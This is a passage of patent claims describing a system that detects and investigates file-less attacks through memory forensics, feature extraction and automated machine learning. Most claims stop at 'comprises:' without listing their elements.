5. The method for file-free attack investigation based on memory forensics according to claim 1, wherein the data set is divided into a training set and a test set, model training is performed on the training set by using an automatic machine learning library, an optimal model is selected, and the optimal model is applied to the data set for testing, so as to obtain a test result, and the method specifically comprises:

6. A file-free attack investigation system based on memory evidence obtaining, characterized in that the system comprises:

7. The memory forensic-based file-less attack investigation system according to claim 6, wherein the memory image acquisition module specifically comprises:

8. The memory forensic-based file-less attack investigation system according to claim 6, wherein the feature extraction module specifically comprises:

9. The memory forensic-based file-less attack investigation system according to claim 6, wherein the data processing module specifically comprises:

the normalization operation formula is:

10. The memory forensic based file-less attack investigation system according to claim 6, wherein the automatic machine learning module specifically comprises: